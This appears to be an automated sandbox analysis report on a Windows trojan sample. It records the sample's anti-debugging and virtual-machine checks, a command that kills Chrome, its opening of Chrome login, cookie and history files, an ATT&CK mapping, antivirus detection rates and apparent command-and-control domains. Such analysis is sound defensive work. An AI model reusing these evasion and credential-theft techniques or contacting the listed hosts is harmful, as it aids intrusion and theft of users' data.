EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueue
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.368253864.0000000002B19000.00000004.00000001.sdmp	Binary or memory string: {72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}s
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.396326945.0000000003EC7000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000003.374949364.0000000002C41000.00000004.00000001.sdmp	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.389162844.0000000003E81000.00000004.00000001.sdmp	Binary or memory string: NetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.385623202.000000000295C000.00000004.00000001.sdmp	Binary or memory string: Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}{K
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.375009282.0000000002959000.00000004.00000001.sdmp	Binary or memory string: {72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}{K
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.368315810.000000000079A000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllh
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.382543706.000000000019B000.00000004.00000010.sdmp	Binary or memory string: VMware Virtual disk 2.0
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.382543706.000000000019B000.00000004.00000010.sdmp	Binary or memory string: VMware
Source: ecv743B.tmp.11.dr	Binary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:BE8AB8DF-DCD1-3523-4A95-3A04EAFF1CBA&ctry=US&time=20200930T152709Z&lc=en-US&pl=en-US&idtp=mid&uid=b029da70-c67b-4a7e-9bd5-517f7e302ed9&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=48d2e04dceaa40b2b5695ef3984d7312&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=663574&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=663574&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.367213379.0000000002A2D000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.385965018.0000000002C6D000.00000004.00000001.sdmp	Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueueSWDMicrosoft Print to PDF{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.396326945.0000000003EC7000.00000004.00000001.sdmp	Binary or memory string: {4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}p

Source: C:\Users\user\AppData\Roaming\1618257864703.exe

Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Code function: 0_2_1001A050 GetCurrentProcess,CheckRemoteDebuggerPresent,

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Thread information set: HideFromDebugger

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Process queried: DebugPort
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Process queried: DebugPort
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Process queried: DebugObjectHandle
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Process queried: DebugFlags

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Code function: 0_2_1000F05C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Code function: 0_2_00408D68 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_00404E19 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10019E40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10019ED0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10019ED0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10019F30 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10019E40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10019ED0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10019ED0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10019F30 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Code function: 0_2_1000E96E GetProcessHeap,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,__heap_term,__RTC_Initialize,GetCommandLineA,___crtGetEnvironmentStringsA,__ioinit,__mtterm,__setargv,__setenvp,__cinit,__ioterm,

Source: C:\Windows\SysWOW64\taskkill.exe

Process token adjusted: Debug

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_1000F05C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_100153B4 SetUnhandledExceptionFilter,__encode_pointer,
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_100153D6 __decode_pointer,SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10018473 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_1000E4AD _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_1000F05C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_100153B4 SetUnhandledExceptionFilter,__encode_pointer,
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_100153D6 __decode_pointer,SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10018473 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_1000E4AD _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 21_2_0001461F SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 21_2_00011C57 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 21_2_0001631F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 21_2_0001373A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Code function: 0_2_1001A150 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexA,GetLastError,

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Code function: 0_2_100177FF cpuid

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: GetLocaleInfoA,

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Code function: 0_2_100197E0 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA,

Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Code function: 0_2_100152B4 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Code function: 0_2_00401000 GetVersionExA,GetVersionExA,GetVersionExA,GetVersionExA,

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\hihistory
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Replication Through Removable Media1	Windows Management Instrumentation1	DLL Side-Loading1	DLL Side-Loading1	Disable or Modify Tools1	OS Credential Dumping1	System Time Discovery11	Replication Through Removable Media1	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Application Shimming1	Application Shimming1	Deobfuscate/Decode Files or Information1	Input Capture1	Peripheral Device Discovery11	Remote Desktop Protocol	Man in the Browser1	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Browser Extensions1	Process Injection11	Obfuscated Files or Information2	Security Account Manager	File and Directory Discovery3	SMB/Windows Admin Shares	Data from Local System1	Automated Exfiltration	Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Bootkit1	Logon Script (Mac)	Install Root Certificate2	NTDS	System Information Discovery57	Distributed Component Object Model	Input Capture1	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing1	LSA Secrets	Query Registry2	SSH	Clipboard Data1	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	DLL Side-Loading1	Cached Domain Credentials	Security Software Discovery451	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Masquerading1	DCSync	Virtualization/Sandbox Evasion13	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Virtualization/Sandbox Evasion13	Proc Filesystem	Process Discovery3	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection11	/etc/passwd and /etc/shadow	Remote System Discovery11	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Bootkit1	Network Sniffing	System Network Configuration Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	75%	Virustotal		Browse
SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	28%	Metadefender		Browse
SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	65%	ReversingLabs	Win32.Trojan.Vigorf
SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	28%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	65%	ReversingLabs	Win32.Trojan.Vigorf
C:\Users\user\AppData\Local\Temp\MSI429C.tmp	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\MSI429C.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe	8%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	3%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	2%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\atl71.dll	3%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\atl71.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll	3%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll	0%	ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://61d347c728b2d94d.com/	0%	Avira URL Cloud	safe
http://55BE681FC6760236.com/o/	0%	Avira URL Cloud	safe
http://BDC347C728B2D94D.com/_1;	0%	Avira URL Cloud	safe
http://84b5a35d6e5335ef.com/info_old/w	0%	Avira URL Cloud	safe
http://back19e64ea00d6ecfe1.io/C	0%	Avira URL Cloud	safe
http://9ED2FEEA30C3CC5D.com/info_old/ddd9	0%	Avira URL Cloud	safe
http://back19e64ea00d6ecfe1.io/Y	0%	Avira URL Cloud	safe
https://deff.nelreports.net/api/report?cat=msn	0%	URL Reputation	safe
https://deff.nelreports.net/api/report?cat=msn	0%	URL Reputation	safe
https://deff.nelreports.net/api/report?cat=msn	0%	URL Reputation	safe
http://BDC347C728B2D94D.com/w	0%	Avira URL Cloud	safe
http://back19e64ea00d6ecfe1.io/info_old/w	0%	Avira URL Cloud	safe
http://61D53B5A4BC1AB86.com/ll	0%	Avira URL Cloud	safe
http://61D53B5A4BC1AB86.com/info_old/ddd	0%	Avira URL Cloud	safe
http://55BE681FC6760236.com/o/H	0%	Avira URL Cloud	safe
http://BDC347C728B2D94D.com/	0%	Avira URL Cloud	safe
https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.js	0%	Avira URL Cloud	safe
https://twitter.comsec-fetch-dest:	0%	Avira URL Cloud	safe
http://images.outbrainimg.com/transform/v3/eyJpdSI6Ijk4OGQ1ZDgwMWE2ODQ2NDNkM2ZkMmYyMGEwOTgwMWQ3MDE2Z	0%	Avira URL Cloud	safe
http://C431A802FF4A46B5.com//L	0%	Avira URL Cloud	safe
http://C431A802FF4A46B5.com/info_old/ddd	0%	Avira URL Cloud	safe
http://C431A802FF4A46B5.com/p	0%	Avira URL Cloud	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://back19e64ea00d6ecfe1.io/	0%	Avira URL Cloud	safe
http://back19e64ea00d6ecfe1.io/7	0%	Avira URL Cloud	safe
http://back19e64ea00d6ecfe1.io/6	0%	Avira URL Cloud	safe
http://84B5A35D6E5335EF.com/info_old/ddd	0%	Avira URL Cloud	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%	0%	URL Reputation	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%	0%	URL Reputation	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%	0%	URL Reputation	safe
http://55be681fc6760236.com/	0%	Avira URL Cloud	safe
http://images.outbrainimg.com/transform/v3/eyJpdSI6ImQ1Y2M3ZjUxNTk0ZjI1ZWI5NjQxNjllMjcxMDliYzA5MWY4N	0%	Avira URL Cloud	safe
http://61D53B5A4BC1AB86.com/	0%	Avira URL Cloud	safe
http://www.vb-cable.comVBCABLE	0%	Avira URL Cloud	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
https://670D67B00237B933.xyz/	0%	Avira URL Cloud	safe
http://84b2feea30c3cc5d.com/	0%	Avira URL Cloud	safe
https://support.goog	0%	Avira URL Cloud	safe
http://61D53B5A4BC1AB86.com/info_old/w	0%	Avira URL Cloud	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1	0%	Avira URL Cloud	safe
https://670D67B00237B933.xyz/T	0%	Avira URL Cloud	safe
http://55BE681FC6760236.com/info_old/ddd	0%	Avira URL Cloud	safe
http://9ede681fc6760236.com/	0%	Avira URL Cloud	safe
http://BDC347C728B2D94D.com/o/	0%	Avira URL Cloud	safe
http://back19e64ea00d6ecfe1.io/h	0%	Avira URL Cloud	safe
http://www.vb-cable.com	0%	Avira URL Cloud	safe
http://BDC347C728B2D94D.com/info_old/dddn	0%	Avira URL Cloud	safe
http://BDC347C728B2D94D.com/info_old/w	0%	Avira URL Cloud	safe
http://back19e64ea00d6ecfe1.io/info_old/wJ	0%	Avira URL Cloud	safe
http://back19e64ea00d6ecfe1.io/info_old/ddd	0%	Avira URL Cloud	safe
